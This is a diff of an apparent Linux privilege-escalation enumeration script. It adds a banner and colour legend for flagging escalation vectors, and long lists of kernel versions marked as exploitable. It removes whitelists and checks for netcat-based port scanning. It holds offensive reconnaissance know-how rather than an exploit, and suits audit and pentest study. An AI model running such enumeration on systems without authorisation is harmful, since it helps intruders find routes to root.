-knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com"
-
-timersG="apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|logrotate.timer|man-db.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ureadahead-stop.timer"
-
-commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib64$|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$"
-commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes"
-
-ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib"
-
-dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|org.blueman.Mechanism|org.bluez|org.debian.apt|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.RealtimeKit1|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.opensuse.CupsPkHelper.Mechanism"
-
-###########################################
-#---------) Checks before start (---------#
-###########################################
-# --) ps working good
-# --) Network binaries
-
-if [ `ps aux 2>/dev/null | wc -l 2>/dev/null` -lt 8 ]; then
- NOUSEPS="1"
-fi
-
-DISCOVER_BAN_BAD="No network discovery capabilities (fping or ping not found)"
-FPING=$(which fping)
-PING=$(which ping)
-if [ "$FPING" ]; then
- DISCOVER_BAN_GOOD="$GREEN$FPING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)"
-else
- if [ "$PING" ]; then
- DISCOVER_BAN_GOOD="$GREEN$PING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)"
- fi
-fi
-
-SCAN_BAN_BAD="No port scan capabilities (nc not found)"
-FOUND_NC=$(which nc 2>/dev/null)
-if [ -z "$FOUND_NC" ]; then
- FOUND_NC=$(which netcat 2>/dev/null);
-fi
-if [ -z "$FOUND_NC" ]; then
- FOUND_NC=$(which ncat 2>/dev/null);
-fi
-if [ -z
"$FOUND_NC" ]; then - FOUND_NC=$(which nc.traditional 2>/dev/null); -fi -if [ -z "$FOUND_NC" ]; then - FOUND_NC=$(which nc.openbsd 2>/dev/null); -fi -if [ "$FOUND_NC" ]; then - SCAN_BAN_GOOD="$GREEN$FOUND_NC$B is available for network discover & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)" -fi ########################################### -#-----------) Main Functions (------------# +#---------------) BANNER (----------------# ########################################### -echo_not_found (){ - printf $DG"$1 Not Found\n"$NC -} - -echo_no (){ - printf $DG"No\n"$NC -} - -print_ps (){ - (ls -d /proc/*/ 2>/dev/null | while read f; do - CMDLINE=`cat $f/cmdline 2>/dev/null | grep -av "seds,"`; #Delete my own sed processess - if [ "$CMDLINE" ]; - then USER2=ls -ld $f | awk '{print $3}'; PID=`echo $f | cut -d "/" -f3`; - printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE"; - fi; - done) 2>/dev/null | sort -r -} - print_banner(){ if [ "$MACPEAS" ]; then bash -c "printf ' 
@@ -433,12 +172,346 @@ print_banner(){
 fi
 }
+
+###########################################
+#-----------) Starting Output (-----------#
+###########################################
+
+echo ""
+if [ !"$QUIET" ]; then print_banner; fi
+printf $B" $SCRIPTNAME $VERSION ${Y}by carlospolop\n"$NC;
+echo ""
+printf $Y"ADVISORY: "$B"$ADVISORY\n"$NC
+echo ""
+printf $B"Linux Privesc Checklist: "$Y"https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC
+echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m,"
+echo " RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${C}[1;31;103m&${C}[0m,"
+echo " RED: You must take a look at it" | sed "s,RED,${C}[1;31m&${C}[0m,"
+echo " LightCyan: Users with console" | sed "s,LightCyan,${C}[1;96m&${C}[0m,"
+echo " Blue: Users without console & mounted devs" | sed "s,Blue,${C}[1;34m&${C}[0m,"
+echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${C}[1;32m&${C}[0m,"
+echo " LightMangeta: Your username" | sed "s,LightMagenta,${C}[1;95m&${C}[0m,"
+if [ "$IAMROOT" ]; then
+ echo ""
+ echo " YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${C}[1;31;103m&${C}[0m,"
+ sleep 3
+fi
+echo ""
+printf " ${DG}Starting $SCRIPTNAME. Caching Writable Folders...$NC"
+echo ""
+
+###########################################
+#---------------) Lists (-----------------#
+###########################################
+
+filename="$SCRIPTNAME.txt$RANDOM"
+kernelB=" 4.0.[0-9]+| 4.1.[0-9]+| 4.2.[0-9]+| 4.3.[0-9]+| 4.4.[0-9]+| 4.5.[0-9]+| 4.6.[0-9]+| 4.7.[0-9]+| 4.8.[0-9]+| 4.9.[0-9]+| 4.10.[0-9]+| 4.11.[0-9]+| 4.12.[0-9]+| 4.13.[0-9]+| 3.9.6| 3.9.0| 3.9| 3.8.9| 3.8.8| 3.8.7| 3.8.6| 3.8.5| 3.8.4| 3.8.3| 3.8.2| 3.8.1| 3.8.0| 3.8| 3.7.6| 3.7.0| 3.7| 3.6.0| 3.6| 3.5.0| 3.5| 3.4.9| 3.4.8| 3.4.6| 3.4.5| 3.4.4| 3.4.3| 3.4.2| 3.4.1| 3.4.0| 3.4| 3.3| 3.2| 3.19.0| 3.16.0| 3.15| 3.14| 3.13.1| 3.13.0| 3.13| 3.12.0| 3.12| 3.11.0| 3.11| 3.10.6| 3.10.0| 3.10| 3.1.0| 3.0.6| 3.0.5| 3.0.4| 3.0.3| 3.0.2| 3.0.1| 3.0.0| 2.6.9| 2.6.8| 2.6.7| 2.6.6| 2.6.5| 2.6.4| 2.6.39| 2.6.38| 2.6.37| 2.6.36| 2.6.35| 2.6.34| 2.6.33| 2.6.32| 2.6.31| 2.6.30| 2.6.3| 2.6.29| 2.6.28| 2.6.27| 2.6.26| 2.6.25| 2.6.24.1| 2.6.24| 2.6.23| 2.6.22| 2.6.21| 2.6.20| 2.6.2| 2.6.19| 2.6.18| 2.6.17| 2.6.16| 2.6.15| 2.6.14| 2.6.13| 2.6.12| 2.6.11| 2.6.10| 2.6.1| 2.6.0| 2.4.9| 2.4.8| 2.4.7| 2.4.6| 2.4.5| 2.4.4| 2.4.37| 2.4.36| 2.4.35| 2.4.34| 2.4.33| 2.4.32| 2.4.31| 2.4.30| 2.4.29| 2.4.28| 2.4.27| 2.4.26| 2.4.25| 2.4.24| 2.4.23| 2.4.22| 2.4.21| 2.4.20| 2.4.19| 2.4.18| 2.4.17| 2.4.16| 2.4.15| 2.4.14| 2.4.13| 2.4.12| 2.4.11| 2.4.10| 2.2.24"
+kernelDCW_Ubuntu_Precise_1="3.1.1-1400-linaro-lt-mx5|3.11.0-13-generic|3.11.0-14-generic|3.11.0-15-generic|3.11.0-17-generic|3.11.0-18-generic|3.11.0-20-generic|3.11.0-22-generic|3.11.0-23-generic|3.11.0-24-generic|3.11.0-26-generic|3.13.0-100-generic|3.13.0-24-generic|3.13.0-27-generic|3.13.0-29-generic|3.13.0-30-generic|3.13.0-32-generic|3.13.0-33-generic|3.13.0-34-generic|3.13.0-35-generic|3.13.0-36-generic|3.13.0-37-generic|3.13.0-39-generic|3.13.0-40-generic|3.13.0-41-generic|3.13.0-43-generic|3.13.0-44-generic|3.13.0-46-generic|3.13.0-48-generic|3.13.0-49-generic|3.13.0-51-generic|3.13.0-52-generic|3.13.0-53-generic|3.13.0-54-generic|3.13.0-55-generic|3.13.0-57-generic|3.13.0-58-generic|3.13.0-59-generic|3.13.0-61-generic|3.13.0-62-generic|3.13.0-63-generic|3.13.0-65-generic|3.13.0-66-generic|3.13.0-67-generic|3.13.0-68-generic|3.13.0-71-generic|3.13.0-73-generic|3.13.0-74-generic|3.13.0-76-generic|3.13.0-77-generic|3.13.0-79-generic|3.13.0-83-generic|3.13.0-85-generic|3.13.0-86-generic|3.13.0-88-generic|3.13.0-91-generic|3.13.0-92-generic|3.13.0-93-generic|3.13.0-95-generic|3.13.0-96-generic|3.13.0-98-generic|3.2.0-101-generic|3.2.0-101-generic-pae|3.2.0-101-virtual|3.2.0-102-generic|3.2.0-102-generic-pae|3.2.0-102-virtual" 
+kernelDCW_Ubuntu_Precise_2="3.2.0-104-generic|3.2.0-104-generic-pae|3.2.0-104-virtual|3.2.0-105-generic|3.2.0-105-generic-pae|3.2.0-105-virtual|3.2.0-106-generic|3.2.0-106-generic-pae|3.2.0-106-virtual|3.2.0-107-generic|3.2.0-107-generic-pae|3.2.0-107-virtual|3.2.0-109-generic|3.2.0-109-generic-pae|3.2.0-109-virtual|3.2.0-110-generic|3.2.0-110-generic-pae|3.2.0-110-virtual|3.2.0-111-generic|3.2.0-111-generic-pae|3.2.0-111-virtual|3.2.0-1412-omap4|3.2.0-1602-armadaxp|3.2.0-23-generic|3.2.0-23-generic-pae|3.2.0-23-lowlatency|3.2.0-23-lowlatency-pae|3.2.0-23-omap|3.2.0-23-powerpc-smp|3.2.0-23-powerpc64-smp|3.2.0-23-virtual|3.2.0-24-generic|3.2.0-24-generic-pae|3.2.0-24-virtual|3.2.0-25-generic|3.2.0-25-generic-pae|3.2.0-25-virtual|3.2.0-26-generic|3.2.0-26-generic-pae|3.2.0-26-virtual|3.2.0-27-generic|3.2.0-27-generic-pae|3.2.0-27-virtual|3.2.0-29-generic|3.2.0-29-generic-pae|3.2.0-29-virtual|3.2.0-31-generic|3.2.0-31-generic-pae|3.2.0-31-virtual|3.2.0-32-generic|3.2.0-32-generic-pae|3.2.0-32-virtual|3.2.0-33-generic|3.2.0-33-generic-pae|3.2.0-33-lowlatency|3.2.0-33-lowlatency-pae|3.2.0-33-virtual|3.2.0-34-generic|3.2.0-34-generic-pae|3.2.0-34-virtual|3.2.0-35-generic|3.2.0-35-generic-pae|3.2.0-35-lowlatency|3.2.0-35-lowlatency-pae|3.2.0-35-virtual" 
+kernelDCW_Ubuntu_Precise_3="3.2.0-36-generic|3.2.0-36-generic-pae|3.2.0-36-lowlatency|3.2.0-36-lowlatency-pae|3.2.0-36-virtual|3.2.0-37-generic|3.2.0-37-generic-pae|3.2.0-37-lowlatency|3.2.0-37-lowlatency-pae|3.2.0-37-virtual|3.2.0-38-generic|3.2.0-38-generic-pae|3.2.0-38-lowlatency|3.2.0-38-lowlatency-pae|3.2.0-38-virtual|3.2.0-39-generic|3.2.0-39-generic-pae|3.2.0-39-lowlatency|3.2.0-39-lowlatency-pae|3.2.0-39-virtual|3.2.0-40-generic|3.2.0-40-generic-pae|3.2.0-40-lowlatency|3.2.0-40-lowlatency-pae|3.2.0-40-virtual|3.2.0-41-generic|3.2.0-41-generic-pae|3.2.0-41-lowlatency|3.2.0-41-lowlatency-pae|3.2.0-41-virtual|3.2.0-43-generic|3.2.0-43-generic-pae|3.2.0-43-virtual|3.2.0-44-generic|3.2.0-44-generic-pae|3.2.0-44-lowlatency|3.2.0-44-lowlatency-pae|3.2.0-44-virtual|3.2.0-45-generic|3.2.0-45-generic-pae|3.2.0-45-virtual|3.2.0-48-generic|3.2.0-48-generic-pae|3.2.0-48-lowlatency|3.2.0-48-lowlatency-pae|3.2.0-48-virtual|3.2.0-51-generic|3.2.0-51-generic-pae|3.2.0-51-lowlatency|3.2.0-51-lowlatency-pae|3.2.0-51-virtual|3.2.0-52-generic|3.2.0-52-generic-pae|3.2.0-52-lowlatency|3.2.0-52-lowlatency-pae|3.2.0-52-virtual|3.2.0-53-generic" 
+kernelDCW_Ubuntu_Precise_4="3.2.0-53-generic-pae|3.2.0-53-lowlatency|3.2.0-53-lowlatency-pae|3.2.0-53-virtual|3.2.0-54-generic|3.2.0-54-generic-pae|3.2.0-54-lowlatency|3.2.0-54-lowlatency-pae|3.2.0-54-virtual|3.2.0-55-generic|3.2.0-55-generic-pae|3.2.0-55-lowlatency|3.2.0-55-lowlatency-pae|3.2.0-55-virtual|3.2.0-56-generic|3.2.0-56-generic-pae|3.2.0-56-lowlatency|3.2.0-56-lowlatency-pae|3.2.0-56-virtual|3.2.0-57-generic|3.2.0-57-generic-pae|3.2.0-57-lowlatency|3.2.0-57-lowlatency-pae|3.2.0-57-virtual|3.2.0-58-generic|3.2.0-58-generic-pae|3.2.0-58-lowlatency|3.2.0-58-lowlatency-pae|3.2.0-58-virtual|3.2.0-59-generic|3.2.0-59-generic-pae|3.2.0-59-lowlatency|3.2.0-59-lowlatency-pae|3.2.0-59-virtual|3.2.0-60-generic|3.2.0-60-generic-pae|3.2.0-60-lowlatency|3.2.0-60-lowlatency-pae|3.2.0-60-virtual|3.2.0-61-generic|3.2.0-61-generic-pae|3.2.0-61-virtual|3.2.0-63-generic|3.2.0-63-generic-pae|3.2.0-63-lowlatency|3.2.0-63-lowlatency-pae|3.2.0-63-virtual|3.2.0-64-generic|3.2.0-64-generic-pae|3.2.0-64-lowlatency|3.2.0-64-lowlatency-pae|3.2.0-64-virtual|3.2.0-65-generic|3.2.0-65-generic-pae|3.2.0-65-lowlatency|3.2.0-65-lowlatency-pae|3.2.0-65-virtual|3.2.0-67-generic|3.2.0-67-generic-pae|3.2.0-67-lowlatency|3.2.0-67-lowlatency-pae|3.2.0-67-virtual|3.2.0-68-generic" 
+kernelDCW_Ubuntu_Precise_5="3.2.0-68-generic-pae|3.2.0-68-lowlatency|3.2.0-68-lowlatency-pae|3.2.0-68-virtual|3.2.0-69-generic|3.2.0-69-generic-pae|3.2.0-69-lowlatency|3.2.0-69-lowlatency-pae|3.2.0-69-virtual|3.2.0-70-generic|3.2.0-70-generic-pae|3.2.0-70-lowlatency|3.2.0-70-lowlatency-pae|3.2.0-70-virtual|3.2.0-72-generic|3.2.0-72-generic-pae|3.2.0-72-lowlatency|3.2.0-72-lowlatency-pae|3.2.0-72-virtual|3.2.0-73-generic|3.2.0-73-generic-pae|3.2.0-73-lowlatency|3.2.0-73-lowlatency-pae|3.2.0-73-virtual|3.2.0-74-generic|3.2.0-74-generic-pae|3.2.0-74-lowlatency|3.2.0-74-lowlatency-pae|3.2.0-74-virtual|3.2.0-75-generic|3.2.0-75-generic-pae|3.2.0-75-lowlatency|3.2.0-75-lowlatency-pae|3.2.0-75-virtual|3.2.0-76-generic|3.2.0-76-generic-pae|3.2.0-76-lowlatency|3.2.0-76-lowlatency-pae|3.2.0-76-virtual|3.2.0-77-generic|3.2.0-77-generic-pae|3.2.0-77-lowlatency|3.2.0-77-lowlatency-pae|3.2.0-77-virtual|3.2.0-79-generic|3.2.0-79-generic-pae|3.2.0-79-lowlatency|3.2.0-79-lowlatency-pae|3.2.0-79-virtual|3.2.0-80-generic|3.2.0-80-generic-pae|3.2.0-80-lowlatency|3.2.0-80-lowlatency-pae|3.2.0-80-virtual|3.2.0-82-generic|3.2.0-82-generic-pae|3.2.0-82-lowlatency|3.2.0-82-lowlatency-pae|3.2.0-82-virtual|3.2.0-83-generic|3.2.0-83-generic-pae|3.2.0-83-virtual|3.2.0-84-generic" 
+kernelDCW_Ubuntu_Precise_6="3.2.0-84-generic-pae|3.2.0-84-virtual|3.2.0-85-generic|3.2.0-85-generic-pae|3.2.0-85-virtual|3.2.0-86-generic|3.2.0-86-generic-pae|3.2.0-86-virtual|3.2.0-87-generic|3.2.0-87-generic-pae|3.2.0-87-virtual|3.2.0-88-generic|3.2.0-88-generic-pae|3.2.0-88-virtual|3.2.0-89-generic|3.2.0-89-generic-pae|3.2.0-89-virtual|3.2.0-90-generic|3.2.0-90-generic-pae|3.2.0-90-virtual|3.2.0-91-generic|3.2.0-91-generic-pae|3.2.0-91-virtual|3.2.0-92-generic|3.2.0-92-generic-pae|3.2.0-92-virtual|3.2.0-93-generic|3.2.0-93-generic-pae|3.2.0-93-virtual|3.2.0-94-generic|3.2.0-94-generic-pae|3.2.0-94-virtual|3.2.0-95-generic|3.2.0-95-generic-pae|3.2.0-95-virtual|3.2.0-96-generic|3.2.0-96-generic-pae|3.2.0-96-virtual|3.2.0-97-generic|3.2.0-97-generic-pae|3.2.0-97-virtual|3.2.0-98-generic|3.2.0-98-generic-pae|3.2.0-98-virtual|3.2.0-99-generic|3.2.0-99-generic-pae|3.2.0-99-virtual|3.5.0-40-generic|3.5.0-41-generic|3.5.0-42-generic|3.5.0-43-generic|3.5.0-44-generic|3.5.0-45-generic|3.5.0-46-generic|3.5.0-49-generic|3.5.0-51-generic|3.5.0-52-generic|3.5.0-54-generic|3.8.0-19-generic|3.8.0-21-generic|3.8.0-22-generic|3.8.0-23-generic|3.8.0-27-generic|3.8.0-29-generic|3.8.0-30-generic|3.8.0-31-generic|3.8.0-32-generic|3.8.0-33-generic|3.8.0-34-generic|3.8.0-35-generic|3.8.0-36-generic|3.8.0-37-generic|3.8.0-38-generic|3.8.0-39-generic|3.8.0-41-generic|3.8.0-42-generic" 
+kernelDCW_Ubuntu_Trusty_1="3.13.0-24-generic|3.13.0-24-generic-lpae|3.13.0-24-lowlatency|3.13.0-24-powerpc-e500|3.13.0-24-powerpc-e500mc|3.13.0-24-powerpc-smp|3.13.0-24-powerpc64-emb|3.13.0-24-powerpc64-smp|3.13.0-27-generic|3.13.0-27-lowlatency|3.13.0-29-generic|3.13.0-29-lowlatency|3.13.0-3-exynos5|3.13.0-30-generic|3.13.0-30-lowlatency|3.13.0-32-generic|3.13.0-32-lowlatency|3.13.0-33-generic|3.13.0-33-lowlatency|3.13.0-34-generic|3.13.0-34-lowlatency|3.13.0-35-generic|3.13.0-35-lowlatency|3.13.0-36-generic|3.13.0-36-lowlatency|3.13.0-37-generic|3.13.0-37-lowlatency|3.13.0-39-generic|3.13.0-39-lowlatency|3.13.0-40-generic|3.13.0-40-lowlatency|3.13.0-41-generic|3.13.0-41-lowlatency|3.13.0-43-generic|3.13.0-43-lowlatency|3.13.0-44-generic|3.13.0-44-lowlatency|3.13.0-46-generic|3.13.0-46-lowlatency|3.13.0-48-generic|3.13.0-48-lowlatency|3.13.0-49-generic|3.13.0-49-lowlatency|3.13.0-51-generic|3.13.0-51-lowlatency|3.13.0-52-generic|3.13.0-52-lowlatency|3.13.0-53-generic|3.13.0-53-lowlatency|3.13.0-54-generic|3.13.0-54-lowlatency|3.13.0-55-generic|3.13.0-55-lowlatency|3.13.0-57-generic|3.13.0-57-lowlatency|3.13.0-58-generic|3.13.0-58-lowlatency|3.13.0-59-generic|3.13.0-59-lowlatency|3.13.0-61-generic|3.13.0-61-lowlatency|3.13.0-62-generic|3.13.0-62-lowlatency|3.13.0-63-generic|3.13.0-63-lowlatency|3.13.0-65-generic|3.13.0-65-lowlatency|3.13.0-66-generic|3.13.0-66-lowlatency" 
+kernelDCW_Ubuntu_Trusty_2="3.13.0-67-generic|3.13.0-67-lowlatency|3.13.0-68-generic|3.13.0-68-lowlatency|3.13.0-70-generic|3.13.0-70-lowlatency|3.13.0-71-generic|3.13.0-71-lowlatency|3.13.0-73-generic|3.13.0-73-lowlatency|3.13.0-74-generic|3.13.0-74-lowlatency|3.13.0-76-generic|3.13.0-76-lowlatency|3.13.0-77-generic|3.13.0-77-lowlatency|3.13.0-79-generic|3.13.0-79-lowlatency|3.13.0-83-generic|3.13.0-83-lowlatency|3.13.0-85-generic|3.13.0-85-lowlatency|3.13.0-86-generic|3.13.0-86-lowlatency|3.13.0-87-generic|3.13.0-87-lowlatency|3.13.0-88-generic|3.13.0-88-lowlatency|3.13.0-91-generic|3.13.0-91-lowlatency|3.13.0-92-generic|3.13.0-92-lowlatency|3.13.0-93-generic|3.13.0-93-lowlatency|3.13.0-95-generic|3.13.0-95-lowlatency|3.13.0-96-generic|3.13.0-96-lowlatency|3.13.0-98-generic|3.13.0-98-lowlatency|3.16.0-25-generic|3.16.0-25-lowlatency|3.16.0-26-generic|3.16.0-26-lowlatency|3.16.0-28-generic|3.16.0-28-lowlatency|3.16.0-29-generic|3.16.0-29-lowlatency|3.16.0-31-generic|3.16.0-31-lowlatency|3.16.0-33-generic|3.16.0-33-lowlatency|3.16.0-34-generic|3.16.0-34-lowlatency|3.16.0-36-generic|3.16.0-36-lowlatency|3.16.0-37-generic|3.16.0-37-lowlatency|3.16.0-38-generic|3.16.0-38-lowlatency|3.16.0-39-generic|3.16.0-39-lowlatency|3.16.0-41-generic|3.16.0-41-lowlatency|3.16.0-43-generic|3.16.0-43-lowlatency|3.16.0-44-generic|3.16.0-44-lowlatency|3.16.0-45-generic" 
+kernelDCW_Ubuntu_Trusty_3="3.16.0-45-lowlatency|3.16.0-46-generic|3.16.0-46-lowlatency|3.16.0-48-generic|3.16.0-48-lowlatency|3.16.0-49-generic|3.16.0-49-lowlatency|3.16.0-50-generic|3.16.0-50-lowlatency|3.16.0-51-generic|3.16.0-51-lowlatency|3.16.0-52-generic|3.16.0-52-lowlatency|3.16.0-53-generic|3.16.0-53-lowlatency|3.16.0-55-generic|3.16.0-55-lowlatency|3.16.0-56-generic|3.16.0-56-lowlatency|3.16.0-57-generic|3.16.0-57-lowlatency|3.16.0-59-generic|3.16.0-59-lowlatency|3.16.0-60-generic|3.16.0-60-lowlatency|3.16.0-62-generic|3.16.0-62-lowlatency|3.16.0-67-generic|3.16.0-67-lowlatency|3.16.0-69-generic|3.16.0-69-lowlatency|3.16.0-70-generic|3.16.0-70-lowlatency|3.16.0-71-generic|3.16.0-71-lowlatency|3.16.0-73-generic|3.16.0-73-lowlatency|3.16.0-76-generic|3.16.0-76-lowlatency|3.16.0-77-generic|3.16.0-77-lowlatency|3.19.0-20-generic|3.19.0-20-lowlatency|3.19.0-21-generic|3.19.0-21-lowlatency|3.19.0-22-generic|3.19.0-22-lowlatency|3.19.0-23-generic|3.19.0-23-lowlatency|3.19.0-25-generic|3.19.0-25-lowlatency|3.19.0-26-generic|3.19.0-26-lowlatency|3.19.0-28-generic|3.19.0-28-lowlatency|3.19.0-30-generic|3.19.0-30-lowlatency|3.19.0-31-generic|3.19.0-31-lowlatency|3.19.0-32-generic|3.19.0-32-lowlatency|3.19.0-33-generic|3.19.0-33-lowlatency|3.19.0-37-generic|3.19.0-37-lowlatency|3.19.0-39-generic|3.19.0-39-lowlatency|3.19.0-41-generic|3.19.0-41-lowlatency|3.19.0-42-generic" 
+kernelDCW_Ubuntu_Trusty_4="3.19.0-42-lowlatency|3.19.0-43-generic|3.19.0-43-lowlatency|3.19.0-47-generic|3.19.0-47-lowlatency|3.19.0-49-generic|3.19.0-49-lowlatency|3.19.0-51-generic|3.19.0-51-lowlatency|3.19.0-56-generic|3.19.0-56-lowlatency|3.19.0-58-generic|3.19.0-58-lowlatency|3.19.0-59-generic|3.19.0-59-lowlatency|3.19.0-61-generic|3.19.0-61-lowlatency|3.19.0-64-generic|3.19.0-64-lowlatency|3.19.0-65-generic|3.19.0-65-lowlatency|3.19.0-66-generic|3.19.0-66-lowlatency|3.19.0-68-generic|3.19.0-68-lowlatency|3.19.0-69-generic|3.19.0-69-lowlatency|3.19.0-71-generic|3.19.0-71-lowlatency|3.4.0-5-chromebook|4.2.0-18-generic|4.2.0-18-lowlatency|4.2.0-19-generic|4.2.0-19-lowlatency|4.2.0-21-generic|4.2.0-21-lowlatency|4.2.0-22-generic|4.2.0-22-lowlatency|4.2.0-23-generic|4.2.0-23-lowlatency|4.2.0-25-generic|4.2.0-25-lowlatency|4.2.0-27-generic|4.2.0-27-lowlatency|4.2.0-30-generic|4.2.0-30-lowlatency|4.2.0-34-generic|4.2.0-34-lowlatency|4.2.0-35-generic|4.2.0-35-lowlatency|4.2.0-36-generic|4.2.0-36-lowlatency|4.2.0-38-generic|4.2.0-38-lowlatency|4.2.0-41-generic|4.2.0-41-lowlatency|4.4.0-21-generic|4.4.0-21-lowlatency|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" +kernelDCW_Ubuntu_Xenial="4.4.0-1009-raspi2|4.4.0-1012-snapdragon|4.4.0-21-generic|4.4.0-21-generic-lpae|4.4.0-21-lowlatency|4.4.0-21-powerpc-e500mc|4.4.0-21-powerpc-smp|4.4.0-21-powerpc64-emb|4.4.0-21-powerpc64-smp|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" 
+kernelDCW_Rhel5_1="2.6.24.7-74.el5rt|2.6.24.7-81.el5rt|2.6.24.7-93.el5rt|2.6.24.7-101.el5rt|2.6.24.7-108.el5rt|2.6.24.7-111.el5rt|2.6.24.7-117.el5rt|2.6.24.7-126.el5rt|2.6.24.7-132.el5rt|2.6.24.7-137.el5rt|2.6.24.7-139.el5rt|2.6.24.7-146.el5rt|2.6.24.7-149.el5rt|2.6.24.7-161.el5rt|2.6.24.7-169.el5rt|2.6.33.7-rt29.45.el5rt|2.6.33.7-rt29.47.el5rt|2.6.33.7-rt29.55.el5rt|2.6.33.9-rt31.64.el5rt|2.6.33.9-rt31.67.el5rt|2.6.33.9-rt31.86.el5rt|2.6.18-8.1.1.el5|2.6.18-8.1.3.el5|2.6.18-8.1.4.el5|2.6.18-8.1.6.el5|2.6.18-8.1.8.el5|2.6.18-8.1.10.el5|2.6.18-8.1.14.el5|2.6.18-8.1.15.el5|2.6.18-53.el5|2.6.18-53.1.4.el5|2.6.18-53.1.6.el5|2.6.18-53.1.13.el5|2.6.18-53.1.14.el5|2.6.18-53.1.19.el5|2.6.18-53.1.21.el5|2.6.18-92.el5|2.6.18-92.1.1.el5|2.6.18-92.1.6.el5|2.6.18-92.1.10.el5|2.6.18-92.1.13.el5|2.6.18-92.1.18.el5|2.6.18-92.1.22.el5|2.6.18-92.1.24.el5|2.6.18-92.1.26.el5|2.6.18-92.1.27.el5|2.6.18-92.1.28.el5|2.6.18-92.1.29.el5|2.6.18-92.1.32.el5|2.6.18-92.1.35.el5|2.6.18-92.1.38.el5|2.6.18-128.el5|2.6.18-128.1.1.el5|2.6.18-128.1.6.el5|2.6.18-128.1.10.el5|2.6.18-128.1.14.el5|2.6.18-128.1.16.el5|2.6.18-128.2.1.el5|2.6.18-128.4.1.el5|2.6.18-128.4.1.el5|2.6.18-128.7.1.el5|2.6.18-128.8.1.el5|2.6.18-128.11.1.el5|2.6.18-128.12.1.el5|2.6.18-128.14.1.el5|2.6.18-128.16.1.el5|2.6.18-128.17.1.el5|2.6.18-128.18.1.el5|2.6.18-128.23.1.el5|2.6.18-128.23.2.el5|2.6.18-128.25.1.el5|2.6.18-128.26.1.el5|2.6.18-128.27.1.el5" 
